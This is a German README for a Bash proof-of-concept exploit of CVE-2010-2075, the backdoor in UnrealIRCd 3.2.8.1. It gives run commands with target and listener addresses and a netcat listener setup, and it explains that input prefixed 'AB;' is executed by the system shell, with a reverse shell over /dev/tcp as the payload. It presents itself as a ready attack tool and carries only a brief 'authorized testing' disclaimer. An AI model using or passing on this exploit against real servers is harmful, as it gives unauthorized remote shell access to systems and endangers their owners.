
CVE-2010-2075 exploit
Bash PoC für die Hintertür, die im Quell-Tarball von UnrealIRCd 3.2.8.1 eingeführt wurde.
Die kompromittierte Binärdatei führt beliebige Befehle aus, die mit AB; versehen und an den IRC-Port gesendet werden.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Beispiel:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Vor dem Ausführen einen Listener einrichten:
nc -lvnp 4444
Die Hintertür prüft eingehende Daten auf das Präfix AB; und übergibt den Rest an die System-Shell.
Der Payload sendet eine Bash-Reverse-Shell über /dev/tcp.
Nur für Bildungszwecke und autorisierte Tests.